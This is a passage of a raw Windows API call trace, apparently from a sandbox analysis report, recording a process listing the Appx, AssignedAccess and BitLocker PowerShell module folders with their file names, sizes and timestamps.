ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0264.683] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0264.683] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0264.683] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0264.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.683] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0264.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.683] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0264.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.684] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.684] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0264.684] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\", lpFilePart=0x0) returned 0x38 [0264.684] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.684] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.684] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0264.688] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0264.688] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0264.688] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0264.688] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.688] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.688] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\Appx.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\appx.psd1")) returned 0x20 [0264.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.689] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0264.689] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", lpFilePart=0x0) returned 0x42 [0264.689] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0264.689] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.689] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37eb452f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37eb452f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psd1", cAlternateFileName="")) returned 1 [0264.690] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x692d2629, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x692f8869, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1d69, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psm1", cAlternateFileName="")) returned 1 [0264.690] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0264.690] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.690] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0264.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.690] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0264.690] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", lpFilePart=0x0) returned 0x42 [0264.690] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0264.691] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.691] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37eb452f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37eb452f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psd1", cAlternateFileName="")) returned 1 [0264.691] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x692d2629, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x692f8869, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1d69, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psm1", cAlternateFileName="")) returned 1 [0264.691] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0264.691] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0264.691] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0264.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.692] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0264.692] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.692] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0264.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.692] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.692] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0264.692] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", lpFilePart=0x0) returned 0x42 [0264.692] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0264.692] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.693] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37eb452f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37eb452f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psd1", cAlternateFileName="")) returned 1 [0264.693] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x692d2629, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x692f8869, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1d69, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psm1", cAlternateFileName="")) returned 1 [0264.693] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0264.693] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.693] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0264.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.693] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\assignedaccess.psd1")) returned 0x20 [0264.694] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.694] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", lpFilePart=0x0) returned 0x3c [0264.694] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", lpFilePart=0x0) returned 0x3d [0264.694] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.694] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.694] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.Format.ps1xml", cAlternateFileName="")) returned 1 [0264.695] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x644, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.psd1", cAlternateFileName="")) returned 1 [0264.695] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48564, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.psm1", cAlternateFileName="")) returned 1 [0264.695] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0264.695] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: 